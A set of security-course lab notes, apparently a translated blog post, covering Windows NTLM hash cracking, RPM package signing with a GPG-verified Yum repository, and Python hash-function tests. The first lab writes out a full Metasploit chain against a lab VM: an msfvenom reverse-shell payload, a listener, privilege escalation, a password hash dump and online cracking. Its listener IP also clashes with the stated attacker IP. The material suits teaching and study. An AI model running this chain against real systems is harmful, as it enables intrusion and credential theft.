[Table of Contents]

1. Cracking LM and NTLM hashes

2. Linux package signing/verification - Yum Repository

3. E-mail digital signature/encryption lab

4. Simple hash function tests

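[Cracking LM and NTLM Hashes]

NTLM (NT LAN Manager)

NTLM is one of the authentication protocols provided by Windows.

It uses a challenge-response authentication scheme.

It is rarely used today, and Microsoft itself recommends against using it.

However, it is still used in some local environments, and it remains built into the SMB protocol for backward compatibility.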

 

LM -> NTLMv1 -> NTLMv2

 

 

 

 

 

[Reference]

Study LM and NTLM hashes using the following sites.

 

NT LAN Manager

https://en.wikipedia.org/wiki/NT_LAN_Manager

 

NTLM Algorithm

https://openwall.info/wiki/john/NTLM

 

LM, NTLM, Net-NTLMv2, oh my!

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4

 

Ntlm() Encrypt & Decrypt

https://md5decrypt.net/en/Ntlm/

 

 

 

 

■ Systems used

kali

win2008

■ Lab scenario

192.168.10.50                     192.168.10.201
---- kali ----                    ---- win2008 ----
reverse_resource.rc
reverse_test.exe      ----->      reverse_test.exe

* getsystem (privilege escalation)

* NTLM hash crack

 

 

 

[Lab] Attack a Windows system, escalate privileges, and crack the passwords

(kali)

(Preparation)

# msfdb init

# systemctl restart postgresql

# systemctl enable postgresql

 

 

 

① Create the reverse_resource.rc file

# cd /test
# cat << EOF > reverse_resource.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.60
set ExitSession false
exploit -j -z
EOF

 

 

 

② reverse_test.exe

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.60 \
    -f exe -o /var/www/html/reverse_test.exe

 

# file /var/www/html/reverse*

 

 

 

③ Start the web server

# systemctl restart apache2

# systemctl status apache2

 

 

 

④ Start the listener

# cd /test

# msfconsole -r reverse_resource.rc

msf6 exploit(multi/handler) > jobs

msf6 exploit(multi/handler) > sessions

 

 

 

⑤ (win2008) Set simple passwords for the users

lusrmgr.msc

- ID/PASS: administrator/1

- ID/PASS: soldesk/2

- ID/PASS: user1/1

- ID/PASS: user2/2

ncpa.cpl

Windows IP = 192.168.10.201

Gateway = 192.168.10.2

⑥ Download the malware

IE: http://192.168.10.60/reverse_test.exe

Download the file to the desktop.

⑦ Run the malware

[Reference] Check whether a file is malware: virustotal.com

Click the reverse_test.exe file on the desktop.

Remember ClamAV!

(kali)

⑧ Work on kali

msf6 exploit(multi/handler) > jobs

msf6 exploit(multi/handler) > sessions

resource (reverse_resource.rc)> exploit -j -z

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

 

[*] Started reverse TCP handler on 192.168.10.60:4444

msf5 exploit(multi/handler) > [*] Sending stage (180291 bytes) to 192.168.10.201

[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.201:1053) at 2020-03-15 11:43:02 +0900

 

<ENTER>

msf5 exploit(multi/handler) > sessions

 

Active sessions

===============

 

Id Name Type Information Connection

-- ---- ---- ----------- ----------

meterpreter x86/windows WINDOW2008\Administrator @ WINDOW2008 192.168.10.60:4444 -> 192.168.10.201:1053 (192.168.10.201)

 

msf5 exploit(multi/handler) > sessions -i 1

[*] Starting interaction with 1...

 

meterpreter > help

-> Output omitted

 

meterpreter > sysinfo

Computer : WINDOW2008

OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture : x64

System Language : ko_KR

Domain : WORKGROUP

Logged On Users : 1

Meterpreter : x86/windows

 

meterpreter > getsystem (on Windows, SYSTEM is the highest privilege)

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > background

[*] Backgrounding session 1...

msf5 exploit(multi/handler) > use post/windows/gather/hashdump

msf5 post(windows/gather/hashdump) > set session 1

session => 1

msf5 post(windows/gather/hashdump) > run (retrieves the hash values)

 

[*] Obtaining the boot key...

[*] Calculating the hboot key using SYSKEY 0dc8086938a003b73bbb85b6b4f2530b...

[*] Obtaining the user list and keys...

[*] Decrypting user keys...

[*] Dumping password hints...

 

No users with password hints on this system

 

[*] Dumping password hashes...

 

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:70427e539c0037169d8738cad05c0cf6:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

soldesk:1002:aad3b435b51404eeaad3b435b51404ee:70427e539c0037169d8738cad05c0cf6:::

user1:1003:aad3b435b51404eeaad3b435b51404ee:f9e37e83b83c47a93c2f09f66408631b:::

user2:1004:aad3b435b51404eeaad3b435b51404ee:c549ee84021e5e8372e10cedeafd02a8:::

 

 

[*] Post module execution completed

 

msf5 post(windows/gather/hashdump) > use auxiliary/analyze/jtr_windows_fast

msf5 auxiliary(analyze/jtr_crack_fast) > run

 

* An error occurred *

Error message

[-] Auxiliary failed: NoMethodError undefined method `jtr_format' for nil:NilClass

[-] Call stack:

[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/crack_windows.rb:303:in `block in hash_file'

[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.4/lib/active_record/relation/delegation.rb:71:in `each'

[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.4/lib/active_record/relation/delegation.rb:71:in `each'

[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/crack_windows.rb:301:in `hash_file'

[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/crack_windows.rb:207:in `run'

 

 

 

-> Output omitted

-> Using online sites: work on user1's NTLM hash at a hash-cracking site

https://crackstation.net/

https://md5decrypt.net/en/Ntlm/
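The same dump read from the defender's side, as an added example that is not part of the original lab: NT hashes are unsalted, so the user:RID:LM:NT lines above already show blank and shared passwords without any cracking. The finding labels are hypothetical names chosen for this sketch; the sample lines are copied from the hashdump output on this page.

```python
from collections import defaultdict

# Well-known constants: the LM and NT hashes of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Lines copied from the hashdump output shown on this page (user:RID:LM:NT:::).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70427e539c0037169d8738cad05c0cf6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
soldesk:1002:aad3b435b51404eeaad3b435b51404ee:70427e539c0037169d8738cad05c0cf6:::
user1:1003:aad3b435b51404eeaad3b435b51404ee:f9e37e83b83c47a93c2f09f66408631b:::
user2:1004:aad3b435b51404eeaad3b435b51404ee:c549ee84021e5e8372e10cedeafd02a8:::
"""


def parse_dump(text):
    """Parse pwdump-style lines into dicts, skipping anything malformed."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return accounts


def audit(accounts):
    """Return (finding, [users]) tuples; the finding names are hypothetical labels."""
    findings = []
    by_nt = defaultdict(list)
    for acct in accounts:
        if acct["lm"] != EMPTY_LM:
            # A real LM hash is stored: the weakest format is still in use.
            findings.append(("LM_HASH_STORED", [acct["user"]]))
        if acct["nt"] == EMPTY_NT:
            findings.append(("BLANK_PASSWORD", [acct["user"]]))
        else:
            by_nt[acct["nt"]].append(acct["user"])
    # No salt: identical NT hashes always mean identical passwords.
    for users in by_nt.values():
        if len(users) > 1:
            findings.append(("SHARED_PASSWORD", users))
    return findings


if __name__ == "__main__":
    for finding, users in audit(parse_dump(SAMPLE_DUMP)):
        print(finding, ", ".join(users))
```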

 

 

 

[Reference] Updating Metasploit Framework

# apt-get -y install metasploit-framework

 

 

 


 

 

 

 

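[Linux Package Signing/Verification - Yum Repository]

■ System used

linux200

■ Lab scenario

Build a package that can be used on a Linux system, sign the built package with a GPG key, set up a Yum repository that serves the package and the GPG key, and then practice how a client system downloads, verifies, and installs the package.

■ Prerequisites

PGP, GPG (GNU PG)

How to use the gpg command (used for file encryption, signature verification, and encrypting communications)

- Google search: "gpg cheat sheet"

- https://gist.github.com/turingbirds/3df43f1920a98010667a

[Reference] How to Create RPM for Your Own Script in CentOS/RedHat

https://tecadmin.net/create-rpm-of-your-own-script-in-centosredhat/

[Reference] HOWTO: GPG sign and verify RPM packages and yum repositories

https://blog.packagecloud.io/eng/2014/11/24/howto-gpg-sign-verify-rpm-packages-yum-repositories/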

https://blog.packagecloud.io/eng/2014/11/24/howto-gpg-sign-verify-rpm-packages-yum-repositories/

 

 

 

(Why) Packaging and package signing?

Program installed from source code --- packaging ---> source.rpm
(EX: /usr/local/apache2)           ----------------> (EX: apache2.rpm)

Set up a YUM repository to make the source.rpm file easy to distribute.

Typical ways to check the integrity of packages/distribution files:

* Using a GPG key

* Using a hash algorithm (EX: md5sum)

- # md5sum /bin/ls

 

 

 

[Lab] Build a package + sign the package + test a YUM repository setup

(Caution) Take down the Web Application Firewall

# cd /etc/httpd/conf.d

# mv mod_security.conf mod_security.conf.old

# systemctl restart httpd

 

 

① Step 1 – Install Required Packages

# yum -y install rpm-build rpmdevtools rpm-sign

-> Output omitted

 

 

② Step 2 – Create Directory Structure

# rpmdev-setuptree (# mkdir -p ~/rpmbuild/{BUILD,RPMS,SOURCES,SPECS,SRPMS,tmp})

# cd ~/rpmbuild

# tree -C (# yum -y install tree)

 

 

③ Step 3 – Create rpmmacro File

# vi ~/.rpmmacros

%packager 타쿠대디

%_topdir %(echo $HOME)/rpmbuild

%_smp_mflags %( \
    [ -z "$RPM_BUILD_NCPUS" ] \\\
        && RPM_BUILD_NCPUS="`/usr/bin/nproc 2>/dev/null || \\\
                             /usr/bin/getconf _NPROCESSORS_ONLN`"; \\\
    if [ "$RPM_BUILD_NCPUS" -gt 16 ]; then \\\
        echo "-j16"; \\\
    elif [ "$RPM_BUILD_NCPUS" -gt 3 ]; then \\\
        echo "-j$RPM_BUILD_NCPUS"; \\\
    else \\\
        echo "-j3"; \\\
    fi )

%__arch_install_post \
    [ "%{buildarch}" = "noarch" ] || QA_CHECK_RPATHS=1 ; \
    case "${QA_CHECK_RPATHS:-}" in [1yY]*) /usr/lib/rpm/check-rpaths ;; esac \
    /usr/lib/rpm/check-buildroot

 

 

④ Step 4 – Copy Files under SOURCES Directory

# mkdir -p ~/rpmbuild/SOURCES/hello-1.0

# cd ~/rpmbuild/SOURCES

# vi hello-1.0/hello.sh

#!/bin/bash

echo 'This is a test.'
echo

echo ' ________________________'
echo '/                        \'
echo '|                        |'
echo '| 야 !! 공부좀 해라!!!   |'
echo '|                        |'
echo '\________________________/'
echo '  \'
echo '   \'
echo '     (__)'
echo '     (oo)______'
echo '     (__)      )\'
echo '        ||---||  *'
echo '        ||   ||'
echo

 

 

# tar cvzf hello-1.0-1.tar.gz hello-1.0

hello-1.0/

hello-1.0/hello.sh


 
⑤ Step 5 – Create SPEC File

# vi ~/rpmbuild/SPECS/hello.spec

%define name hello

%define version 1.0

%define release 1

 

Name: hello

Version: 1.0

Release: 1

Summary: Hello

Group: CentOS

License: GPL

URL: http://www.example.com

Source0: %{name}-%{version}-%{release}.tar.gz

BuildRoot: /var/tmp/%{name}-buildroot

 

%description

Installs /root/bin/hello.sh

 

%prep

%setup -q -n %{name}-%{version}

 

%build

 

%install

rm -rf $RPM_BUILD_ROOT

mkdir -p $RPM_BUILD_ROOT/root/bin

install -m 755 hello.sh $RPM_BUILD_ROOT/root/bin/hello.sh

 

%clean

rm -rf $RPM_BUILD_ROOT

 

%files

%defattr(-,root,root,-)

/root/bin/hello.sh

 

%changelog

 

 

⑥ Step 6 – Build RPM

# cd ~/rpmbuild

# rpmbuild -ba SPECS/hello.spec

-> Output omitted

# tree -C

.
├── BUILD
│   └── hello-1.0
│       ├── debugfiles.list
│       ├── debuglinks.list
│       ├── debugsources.list
│       ├── elfbins.list
│       └── hello.sh
├── BUILDROOT
├── RPMS
│   └── x86_64
│       ├── hello-1.0-1.x86_64.rpm
│       └── hello-debuginfo-1.0-1.x86_64.rpm
├── SOURCES
│   ├── hello-1.0
│   │   └── hello.sh
│   └── hello-1.0-1.tar.gz
├── SPECS
│   └── hello.spec
└── SRPMS
    └── hello-1.0-1.src.rpm

9 directories, 11 files


⑦ Test

# cd RPMS/x86_64

# rpm -Uvh hello-1.0-1.x86_64.rpm

Preparing... ################################# [100%]

Updating / installing...

1:hello-1.0-1 ################################# [100%]

 

 

# rpm -ql hello-1.0-1

/root/bin/hello.sh

 

 

# rpm -qi hello-1.0-1

Name : hello

Version : 1.0

Release : 1

Architecture: x86_64

Install Date: Wed 12 Feb 2020 02:17:05 PM KST

Group : CentOS

Size : 394

License : GPL

Signature : (none)

Source RPM : hello-1.0-1.src.rpm

Build Date : Wed 12 Feb 2020 01:17:46 PM KST

Build Host : linux200.example.com

Relocations : (not relocatable)

URL : http://www.example.com

Summary : Hello

Description :

Installs /root/bin/hello.sh

 

 

# hello.sh

-> Output omitted

 

# rpm -e hello-1.0-1

#

 

 

⑧ Generate a GPG key and sign the package

# cd

# gpg --gen-key

gpg (GnuPG) 1.4.5; Copyright (C) 2006 Free Software Foundation, Inc.

This program comes with ABSOLUTELY NO WARRANTY.

This is free software, and you are welcome to redistribute it

under certain conditions. See the file COPYING for details.

 

gpg: directory `/root/.gnupg' created

gpg: new configuration file `/root/.gnupg/gpg.conf' created

gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run

gpg: keyring `/root/.gnupg/secring.gpg' created

gpg: keyring `/root/.gnupg/pubring.gpg' created

Please select what kind of key you want:

(1) DSA and Elgamal (default)

(2) DSA (sign only)

(5) RSA (sign only)

Your selection? <ENTER>

DSA keypair will have 1024 bits.

ELG-E keys may be between 1024 and 4096 bits long.

What keysize do you want? (2048) <ENTER>

Please specify how long the key should be valid.

0 = key does not expire

<n> = key expires in n days

<n>w = key expires in n weeks

<n>m = key expires in n months

<n>y = key expires in n years

Key is valid for? (0) <ENTER>

Key does not expire at all

Is this correct? (y/N) y

 

You need a user ID to identify your key; the software constructs the user ID

from the Real Name, Comment and Email Address in this form:

"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"

 

Real name: takudaddy

Email address: takudaddy@naver.com

Comment:

You selected this USER-ID:

"takudaddy <takudaddy@naver.com>"

 

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o

You need a Passphrase to protect your secret key.

 

Passphrase: testing123

Repeat passphrase: testing123

 

We need to generate a lot of random bytes. It is a good idea to perform

some other action (type on the keyboard, move the mouse, utilize the

disks) during the prime generation; this gives the random number

generator a better chance to gain enough entropy.

We need to generate a lot of random bytes. It is a good idea to perform

some other action (type on the keyboard, move the mouse, utilize the

disks) during the prime generation; this gives the random number

generator a better chance to gain enough entropy.

gpg: /root/.gnupg/trustdb.gpg: trustdb created

gpg: key A1D27855 marked as ultimately trusted

public and secret key created and signed.

 

gpg: checking the trustdb

gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model

gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u

pub 2048R/A1D27855 2021-01-13

Key fingerprint = 0E8B 22D4 5480 5BAF A502 5C3F 1BBE 7183 A1D2 7855

uid takudaddy <takudaddy@naver.com>

sub 2048R/B107D059 2021-01-13

 

-> Note the Key ID: A1D27855

- Create the ~/RPM-GPG-KEY-test file

# gpg -a -o ~/RPM-GPG-KEY-test --export A1D27855

# ls RPM*

RPM-GPG-KEY-test

 

 

# cat RPM-GPG-KEY-test

-> Output omitted

 

 

- Create the ~/.rpmmacros file

# vi ~/.rpmmacros

%_gpg_name A1D27855

 

%packager 타쿠대디

 

%_topdir %(echo $HOME)/rpmbuild

 

- Output omitted -

 

 

 

⑨ Sign the package

Signing a package

# rpmsign --addsign PKG.rpm

or

# rpm --addsign PKG.rpm

Re-signing a package

# rpm --resign PKG.rpm

 

 

# rpmsign --addsign rpmbuild/RPMS/x86_64/hello-1.0-1.x86_64.rpm

Enter pass phrase: testing123

Pass phrase is good.

rpmbuild/RPMS/x86_64/hello-1.0-1.x86_64.rpm:


 
$HOME/RPM-GPG-KEY-test

 /usr/src/redhat/RPMS/x86_64/hello-1.0-1.i386.rpm (sign)

 

 

 

⑩ Set up the distribution server (YUM Repository)

 

# mkdir /var/www/html/packages

# cp ~/rpmbuild/RPMS/x86_64/hello-1.0-1.*.rpm /var/www/html/packages

# cp ~/RPM-GPG-KEY-test /var/www/html/packages

# tree /var/www/html

-> Details omitted

 

# yum -y install createrepo

# createrepo /var/www/html/packages

 

1/1 - hello-1.0-1.i386.rpm

 

Saving Primary metadata

Saving file lists metadata

Saving other metadata

 

 

# tree /var/www/html

-> Details omitted

# systemctl restart httpd (# service httpd restart)

 

 

 

⑪ Create the hello.repo file

# vi /etc/yum.repos.d/hello.repo

[hello]

name=hello

description=Test Yum Repository

baseurl=http://192.168.10.200/packages

enabled=1

gpgcheck=1

gpgkey=http://192.168.10.200/packages/RPM-GPG-KEY-test

 

192.168.10.200: IP of the linux200 server

-> Specify the IP of the Yum repository server.

⑫ Verify the installation

# yum -y install hello

Loaded plugins: fastestmirror, langpacks

Loading mirror speeds from cached hostfile

* base: mirror.kakao.com

* extras: mirror.kakao.com

* updates: mirror.kakao.com

hello | 2.9 kB 00:00:00

hello/primary_db | 1.6 kB 00:00:00

Resolving Dependencies

--> Running transaction check

---> Package hello.x86_64 0:1.0-1 will be installed

--> Finished Dependency Resolution

 

Dependencies Resolved

 

==========================================================================================

Package Arch Version Repository Size

==========================================================================================

Installing:

hello x86_64 1.0-1 hello 2.8 k

 

Transaction Summary

==========================================================================================

Install 1 Package

 

Total download size: 2.8 k

Installed size: 394

 

Downloading packages:

warning: /var/cache/yum/x86_64/7/hello/packages/hello-1.0-1.x86_64.rpm: Header V4 RSA/SHA1 Signature, key ID a1d27855: NOKEY

Public key for hello-1.0-1.x86_64.rpm is not installed

hello-1.0-1.x86_64.rpm | 2.8 kB 00:00

Retrieving key from http://192.168.10.200/packages/RPM-GPG-KEY-test

Importing GPG key 0xA1D27855:

Userid : "takudaddy <takudaddy@naver.com>"

Fingerprint: 0e8b 22d4 5480 5baf a502 5c3f 1bbe 7183 a1d2 7855

From : http://192.168.10.200/packages/RPM-GPG-KEY-test

 

Running transaction check

Running transaction test

Transaction test succeeded

Running transaction

Installing : hello-1.0-1.x86_64 1/1

Verifying : hello-1.0-1.x86_64 1/1

 

Installed:

hello.x86_64 0:1.0-1

 

Complete!


# hello.sh

 ________________________
/                        \
|                        |
| 야 !! 공부좀 해라!!!   |
|                        |
\________________________/
  \
   \
     (__)
     (oo)______
     (__)      )\
        ||---||  *
        ||   ||

 

 

(Restore) Restore the hello.repo file

# vi /etc/yum.repos.d/hello.repo

[hello]

name=hello

description=Test Yum Repository

baseurl=http://172.16.9.252/packages

enabled=0

gpgcheck=1

gpgkey=http://172.16.9.252/packages/RPM-GPG-KEY-test

 

Alternatively, disable it with the commands below

# yum repolist

# yum-config-manager --disable hello
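A check a practitioner would run over the repo definitions used in this lab, as an added example that is not part of the original post: in hello.repo the public key that verifies the package is fetched over the same plain-HTTP channel as the package, and yum -y accepts the key import without asking. The finding names, the two extra repo sections and repo.example.com are constructed for comparison.

```python
import configparser
from urllib.parse import urlparse

PLAINTEXT_SCHEMES = {"http", "ftp"}

# Constructed sample: the hello.repo from this page, plus a weak and a
# hardened variant (both hypothetical) for comparison.
SAMPLE_REPO = """\
[hello]
name=hello
description=Test Yum Repository
baseurl=http://192.168.10.200/packages
enabled=1
gpgcheck=1
gpgkey=http://192.168.10.200/packages/RPM-GPG-KEY-test

[hello-nocheck]
name=hello (weak variant)
baseurl=http://192.168.10.200/packages
enabled=1
gpgcheck=0

[hello-pinned]
name=hello (hardened variant)
baseurl=https://repo.example.com/packages
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-test
"""


def _on(value):
    """yum accepts 1/0, yes/no and true/false for boolean options."""
    return str(value).strip().lower() in {"1", "yes", "true", "on"}


def _plaintext(urls):
    return any(urlparse(u).scheme in PLAINTEXT_SCHEMES for u in urls.split())


def audit_repo(text):
    """Return {repo_id: [finding, ...]} for every enabled repo section."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    report = {}
    for repo in cp.sections():
        sec = cp[repo]
        if not _on(sec.get("enabled", "1")):
            continue  # disabled repos are never consulted
        issues = []
        if "gpgcheck" not in sec:
            issues.append("GPGCHECK_NOT_SET")  # falls back to [main] in yum.conf
        elif not _on(sec["gpgcheck"]):
            issues.append("GPGCHECK_DISABLED")
        # The key is the trust anchor: over plain HTTP it can be swapped in
        # transit together with a package signed by the swapped key.
        if _plaintext(sec.get("gpgkey", "")):
            issues.append("GPGKEY_OVER_PLAINTEXT")
        # gpgcheck covers packages only; repodata needs repo_gpgcheck or TLS.
        if _plaintext(sec.get("baseurl", "")) and not _on(sec.get("repo_gpgcheck", "0")):
            issues.append("UNSIGNED_METADATA_OVER_PLAINTEXT")
        report[repo] = issues
    return report


if __name__ == "__main__":
    for repo, issues in audit_repo(SAMPLE_REPO).items():
        print(repo, issues or "ok")
```

Installing the key from local media and comparing its fingerprint with the one printed by gpg --gen-key on the build host removes the dependence on the download channel.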

 

 

[Reference] Writing a spec file

Writing the spec file is the most important part of the process; refer to the following sites and try writing a suitable spec file.

http://www.cubrid.com/zbxe/bbs_developer_tutorial/149970

http://kthan.tistory.com/entry/리눅스Linux-RPM-만드는-방법과-spec파일-작성법

http://onecellboy.tistory.com/267

 

 


 

 

 

[E-mail Digital Signature/Encryption Lab]

Lab failed because of a Thunderbird version update

 

 

 


 

 

 

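[Simple Hash Function Tests]

Hash Function

A cryptographic hash function takes an arbitrary binary string as input and produces a fixed-length output (the digest or hash value).

Deriving the original input data from the digest is practically infeasible.

In other words, a cryptographic hash function is one-way (pre-image resistance).

Given the digest of one message, it is also practically infeasible to find another message (second pre-image) with the same digest (weak collision resistance).

Finally, it is infeasible to find two arbitrary messages that have the same digest (strong collision resistance).

Regardless of the hash algorithm, an n-bit digest is at most as secure as a symmetric encryption algorithm keyed with n/2 bits (birthday attack).

Hash functions can be used simply as integrity checks.

Combined with a public-key algorithm, they can implement digital signatures.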

 

 

 

■ HASH_Test1.py

from Crypto.Hash import SHA256 as SHA

# Create the hash object and pass the data at the same time.
hash = SHA.new(data=b'Some data')
print('Original1:', hash.hexdigest())

# Create the hash object first, then add the data.
hash = SHA.new()
print('Original2:', hash.hexdigest())
hash.update(b'Some data')
print('Original3:', hash.hexdigest())

 

Original1: 1fe638b478f8f0b2c2aab3dbfd3f05d6dfe2191cd7b4482241fe58567e37aef6

Original2: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Original3: 1fe638b478f8f0b2c2aab3dbfd3f05d6dfe2191cd7b4482241fe58567e37aef6

 

 

■ HASH_Test2.py

from Crypto.Hash import SHA256 as SHA

# Create a hash object, then update it with b'First' and b'Second' separately.
hash = SHA.new()
print('Original :', hash.hexdigest())

hash.update(b'First')
print('First :', hash.hexdigest())
hash.update(b'Second')
print('Second :', hash.hexdigest())

# Create a hash object over b'FirstSecond' in one go.
hash2 = SHA.new(b'FirstSecond')
print('1st2nd :', hash2.hexdigest())

Original : e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

First : a151ceb1711aad529a7704248f03333990022ebbfa07a7f04c004d70c167919f

Second : cad4c5623efc0ae67dbe8274e7ffc184ca91df37a8e844624240f8eef1300ce7

1st2nd : cad4c5623efc0ae67dbe8274e7ffc184ca91df37a8e844624240f8eef1300ce7

 

 

 

 

[Lab] Check the differences between SHA3-224, SHA3-256, SHA3-384, and SHA3-512

■ SHA3-224.py

from Crypto.Hash import SHA3_224

hash = SHA3_224.new()
hash.update(b'Some data')
print(hash.hexdigest())

■ SHA3-256

from Crypto.Hash import SHA3_256
hash256 = SHA3_256.new()

■ SHA3-384

from Crypto.Hash import SHA3_384
hash384 = SHA3_384.new()

■ SHA3-512

from Crypto.Hash import SHA3_512
hash512 = SHA3_512.new()

 

 

■ SHA3-224-256-384-512.py

from Crypto.Hash import SHA3_224

from Crypto.Hash import SHA3_256

from Crypto.Hash import SHA3_384

from Crypto.Hash import SHA3_512

 

# SHA3_224

hash224 = SHA3_224.new()

hash224.update(b'Some data')

print('hash224:', hash224.hexdigest())

 

# SHA3_256

hash256 = SHA3_256.new()

hash256.update(b'Some data')

print('hash256:', hash256.hexdigest())

 

# SHA3_384

hash384 = SHA3_384.new()

hash384.update(b'Some data')

print('hash384:', hash384.hexdigest())

 

# SHA3_512

hash512 = SHA3_512.new()

hash512.update(b'Some data')

print('hash512:', hash512.hexdigest())

hash224: 954ad9fc5a521a0a78fba2e69e3bf14edf7386f3be2e6d354fd7aac8

hash256: 86b8648658d163a47203c7101c327eb8434d741aa4b14b1b3ff9c08ba723bcd1

hash384: 367e70c5e9bc3e4ad8ba30b163720965016a50dacc651621d09de0bde3c63a85a9dcdf790cf33c21f3539412d2b55c82

hash512: 71244a0cc9d38321553682b6c9cfcf30d7fee2d0e4710326c2f739189d7622a6cca3f776c532009fd1fed163a79165ada43a1a3b424063ec4f3fccc6fd1c1f66



What is the difference between SHA3-224, 384, 256, and 512?

The length of the hash value

[Lab]

BLAKE2s, BLAKE2b

 

 

■ BLAKE2s (for 32-bit platforms)

https://pycryptodome.readthedocs.io/en/latest/src/hash/blake2s.html

BLAKE2s is an optimized variant of BLAKE, one of the SHA-3 candidates that made it to the final round of the NIST hash competition. (RFC 7693)

The algorithm uses 32-bit words, so it works best on 32-bit platforms.

The digest size ranges from 8 to 256 bits.

■ BLAKE2b (for 64-bit platforms)

https://pycryptodome.readthedocs.io/en/latest/src/hash/blake2b.html

BLAKE2b is an optimized variant of BLAKE, one of the SHA-3 candidates that made it to the final round of the NIST hash competition. (RFC 7693)

The algorithm uses 64-bit words, so it works best on 64-bit platforms.

The digest size ranges from 8 to 512 bits.

from Crypto.Hash import BLAKE2s

# Create a hash object (default)
hash = BLAKE2s.new()
print('Original :', hash.hexdigest())

# Create a hash object, digest bits: 256 (the output shows this is the default)
hash = BLAKE2s.new(digest_bits=256)
print('BLAKE2s-256:', hash.hexdigest())

# Create a hash object, digest bits: 128
hash = BLAKE2s.new(digest_bits=128)
print('BLAKE2s-128:', hash.hexdigest())

 

Original : 69217a3079908094e11121d042354a7c1f55b6482ca1a51e1b250dfd1ed0eef9

BLAKE2s-256: 69217a3079908094e11121d042354a7c1f55b6482ca1a51e1b250dfd1ed0eef9

BLAKE2s-128: 64550d6ffe2c0a01a14aba1eade0200c

 

 

■ BLAKE2s can act as a cryptographic MAC when initialized with a secret key.

from Crypto.Hash import BLAKE2s

 

mac = BLAKE2s.new(digest_bits=128, key=b'secret')

mac.update(b'Some data')

print(mac.hexdigest())

 

3fb47e623d0031b97f5fa77b63add3c5

 


■ BLAKE2s versus BLAKE2b

from Crypto.Hash import BLAKE2s

from Crypto.Hash import BLAKE2b

 

mac = BLAKE2s.new(digest_bits=128, key=b'secret')

mac.update(b'Some data')

print('BLAKE2s :', mac.hexdigest())

 

mac = BLAKE2b.new(digest_bits=128, key=b'secret')

mac.update(b'Some data')

print('BLAKE2b :', mac.hexdigest())

 

BLAKE2s : 3fb47e623d0031b97f5fa77b63add3c5

BLAKE2b : 1226fda19db309f567d016ef58f1f309
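HASH_Test2.py shows that successive update() calls are simply concatenated, and the keyed BLAKE2s examples show the MAC mode; the added example below (not from the original post) combines the two to show why a tag over several fields must encode the field boundaries, and how to verify it in constant time. It uses Python's standard hashlib and hmac instead of PyCryptodome so it runs without extra packages; the function names and the sample key are assumptions made for this sketch.

```python
import hashlib
import hmac

KEY = b"secret"  # sample key taken from the BLAKE2s MAC example on this page


def naive_digest(fields):
    """Feed each field to update() in turn, the way HASH_Test2.py does."""
    h = hashlib.sha256()
    for field in fields:
        h.update(field)
    return h.hexdigest()


def framed_tag(key, fields, digest_size=16):
    """Keyed BLAKE2s tag over length-prefixed fields (128-bit by default)."""
    mac = hashlib.blake2s(key=key, digest_size=digest_size)
    mac.update(len(fields).to_bytes(4, "big"))      # number of fields
    for field in fields:
        mac.update(len(field).to_bytes(8, "big"))   # boundary becomes part of the input
        mac.update(field)
    return mac.hexdigest()


def verify(key, fields, tag_hex):
    """Constant-time check of a received hex tag; malformed input is rejected."""
    try:
        received = bytes.fromhex(tag_hex)
    except (ValueError, TypeError):
        return False
    expected = bytes.fromhex(framed_tag(key, fields))
    return hmac.compare_digest(expected, received)


if __name__ == "__main__":
    a = [b"First", b"Second"]
    b = [b"Firs", b"tSecond"]
    # Different field lists, same byte stream: the plain digests collide.
    print("naive equal :", naive_digest(a) == naive_digest(b))
    # With framing the two inputs no longer produce the same tag.
    print("framed equal:", framed_tag(KEY, a) == framed_tag(KEY, b))
    tag = framed_tag(KEY, a)
    print("verify ok   :", verify(KEY, a, tag))
    print("verify moved:", verify(KEY, b, tag))
```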

 

 

 

[Reference] How can the algorithm be inferred from a hash value alone?

Because the hash value (digest) differs from one hash algorithm to another, the algorithm can sometimes be partly inferred.

Check the "Generic Hash types" section on the following site.

https://hashcat.net/wiki/doku.php?id=example_hashes

 

 

 

 
